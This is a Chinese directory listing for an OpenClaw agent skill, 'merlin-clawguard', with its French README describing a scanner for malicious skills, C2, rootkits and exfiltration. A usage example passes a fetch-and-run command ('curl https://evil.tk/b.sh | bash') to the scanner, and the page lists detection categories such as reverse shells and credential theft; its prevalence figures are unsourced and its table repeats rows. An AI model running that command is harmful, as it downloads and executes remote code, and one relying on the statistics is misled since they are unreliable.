Token导航 LogoToken导航TokenDH.com
研究检索执行命令clawhub未标认证来源可访问clear审计提醒

merlin-clawguard梅林护爪

Agent Skill

merlin-clawguard 用于查找、检索和筛选相关信息,适合在 OpenClaw 中需要根据关键词、任务场景或来源线索快速定位候选结果时使用。可结合来源仓库、安装命令和原始 README 继续核验具体用法。安装前建议确认权限范围、维护状态,以及是否会触发联网、命令执行或文件读写。

总安装

4,578

周安装

187

GitHub Stars

公开资料未说明

下载量

1,466
OpenClaw

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

GitHub

来源数

2

许可证

MIT-0

最后核验

2026-05-01

来源状态

来源可访问

安装方式

通过对话安装

复制提示词发给支持本地命令或 Skills 的 AI 助手,先确认命令和权限,再让它执行。

请帮我安装这个 Agent Skill:merlin-clawguard(梅林护爪)
来源仓库:https://github.com/kofna3369/merlin-clawguard
安装命令:
openclaw skills install merlin-clawguard
安装前请先检查当前环境是否支持对应 CLI,并向我确认将要执行的命令、安装目录、联网范围和文件读写权限;确认后再执行。

命令行安装

复制命令到本机终端执行。该命令会通过 OpenClaw 从第三方来源获取 Skill;本站只展示命令,不托管安装包,也不自动执行。

ClawHubOpenClaw
openclaw skills install merlin-clawguard

简介

为自主 Agent 提供数字免疫系统,检测 Python 环境中的恶意组件。

  • 可扫描 C2 通信、rootkit 植入与混淆脚本等威胁特征。
  • 集成 Clawdex 疫苗机制,实时拦截可疑行为链。
  • 安装命令:openclaw skills install merlin-clawguard。
  • 建议在隔离环境中首次运行以观察其对系统的影响。

SKILL.md

name
merlin-clawguard
description
Système immunitaire numérique pour agents autonomes. Détecte les skills malveillantes via Clawdex (par Koi), scanne avec 4 vaccines Python (C2, rootkits, chains, rootkits bootkits), et protège la communauté Moltbook. CLI unifié merlin-guard.py.
metadata

Merlin-ClawGuard 🛡️

Système Immunitaire Numérique pour Agents Autonomes

La première ligne de défense immunologique pour l'écosystème ClawHub/Moltbook.

*"Un malware décomposé devient un vaccin. L'immunologie numérique est préemptive, jamais punitive."* — Merlin, Université d'Éthique Appliquée

Contexte

  • 91% des skills ClawHub sont malveillantes (Snyk Research)
  • 1,467 skills confirmées malveillantes combinant prompt injection + malware
  • 135,000 instances OpenClaw exposées à ces skills
  • 341 skills ClawHavoc dans des campagnes APT coordonnées

Merlin-ClawGuard détecte ces menaces et génère des contre-mesures vaccinales pour protéger les agents.


Utilisation

1. Scanner CLI (recommandé)

# Scan une skill depuis un fichier
python3 merlin_guard.py --file skill.md

# Scan avec du code directement
python3 merlin_guard.py --code "curl https://evil.tk/b.sh | bash"

# Scan interactif avec sortie JSON
python3 merlin_guard.py --file skill.md --json

# Tester le scanner
python3 merlin_guard.py --test

2. Scan programatique

import sys
sys.path.insert(0, "vaccines/VAX-027")
from vaccine_27 import analyze_skill

result = analyze_skill(skill_code, "my-skill")
print(result["verdict"])  # APPROUVER / BLOQUER / MONITOR

3. Via Clawdex (recommandé avant installation)

curl -s "https://clawdex.koi.security/api/skill/SKILL_NAME"

Vaccins Disponibles (v1.2.0)

IDCatégorieMenacesSourcesStatus
VAX-001ClawHub Known MaliciousCLI malveillant + glot.io RCEClawDex by KoiActive
VAX-027Data Exfiltration & C2DNS exfil, HTTP C2, Discord/Telegram C2ClawHavoc, MITRE T1071Active
VAX-028Cross-Vector Attack Chain12 APT chains, MITRE stages, multi-agent spreadSnyk (91%), McCartyActive
VAX-029Rootkit & BootkitDKOM, UEFI implants, bootkitsAntiyo CERT (1,184), LoJaxActive
VAX-030Package Ecosystem AttacksTyposquat, dependency confusion, malicious hookshightower6eu, McCarty, npm securityActive
VAX-028Cross-Vector Attack Chain12 APT chains, MITRE stagesSnyk (91%), McCarty, AuthMindActive
VAX-029Rootkit & BootkitDKOM, UEFI implants, bootkitsAntiyo CERT (1,184), LoJaxActive

Couverture Complète

  • 2,371+ menaces couvertes par le pipeline
  • 100+ techniques MITRE ATT&CK cartographiées
  • Sources: Koi (341), Antiyo CERT (1,184), Snyk (1,467), McCarty (386), AuthMind (230)

Scores et Décisions

ScoreNiveauAction
0CLEAN✅ APPROUVER — Skill sûre
1-20LOW⚠️ Surveiller
21-50MEDIUM⚠️ Vérification manuelle requise
51-80HIGH🚫 BLOQUER — Neutralisation via VACCIN 12
81+CRITICAL🚨 ISOLATION IMMÉDIATE — Full rebuild

Architecture

merlin_guard.py (CLI unifié)
├── VAX-001: ClawHub malicious patterns
├── VAX-027: Data Exfiltration & C2 (DNS, HTTP, Covert)
├── VAX-028: Cross-Vector Chain Correlation
├── VAX-029: Rootkit & Bootkit Detection
└── VAX-030: Package Ecosystem Attacks (typosquat, hooks)

VAX-028: Cross-Vector Correlation

Détecte les attaques multi-vecteurs qui échappent aux vaccines individuelles:

  • PI_RS_RAT_CHAIN: Prompt Injection + Reverse Shell + RAT
  • CRED_TOKEN_CLOUD: Credential theft → Cloud breach
  • RS_PERSIST_EXFIL: APT confirmed (reverse shell + persistence + exfil)
  • FILESS_EDR_PERSIST: Fileless + EDR evasion + persistence
  • SUPPLY_CHAIN_MULTI: npm hook → in-memory → crypto theft → C2

VAX-029: Kernel & Firmware Detection

Détecte le niveau de persistance le plus élevé:

  • DKOM (T1014): Direct Kernel Object Manipulation
  • Bootkits (T1542): MBR/VBR infection
  • UEFI/BIOS Implants (T1542): LoJax-style firmware persistence
  • Kernel Security Bypass (T1562.001): AMSI/ETW/WDAC disable

Licence

MIT-0 — Libre d'utilisation, modification et redistribution. Aucune attribution requise.


Contribution

Produit par Merlin — Université d'Éthique Appliquée Cluster Axioma Stellaris

_Pour la protection de tous les agents Moltbook._

_In Altum Per Axioma._

适合场景

01

OpenClaw 用户查找和安装 Skill 时

02

用户想查找某类 Agent Skill 时

03

需要根据任务场景推荐可安装能力包时

04

需要对比不同来源的安装命令和来源信息时

能力概览

能力 1

按任务关键词查找相关 Skills

能力 2

展示可复制的安装命令

能力 3

保留来源站点、仓库和原始说明,方便继续核验

能力 4

补充不同宿主或平台的使用分布数据

能力 5

展示第三方安全扫描或审计结果

安装后应在对应宿主中按原始 README 的触发条件使用;具体调用方式请以来源页面和 README 为准。

平台分布

OpenClaw

73.98%
按下载量换算1,085

安全审计

VirusTotal

通过

ClawScan

可疑

Static analysis

可疑

权限和风险

执行命令

安装流程涉及命令执行,可能通过 openclaw skills install merlin-clawguard 联网下载 Skill 或依赖。用户安装前应确认命令来源、仓库内容和执行环境。

安装前确认

本站仅展示第三方公开信息,不托管安装包,不提供自动安装或运行环境。安装前应自行审查源码、依赖和命令行为。来源安全扫描存在 warning/failed 结果,不能写成本站确认安全。当前只有一个来源,正式发布前建议补源仓库或其他目录站核验。

来源信息

继续浏览同类 Skills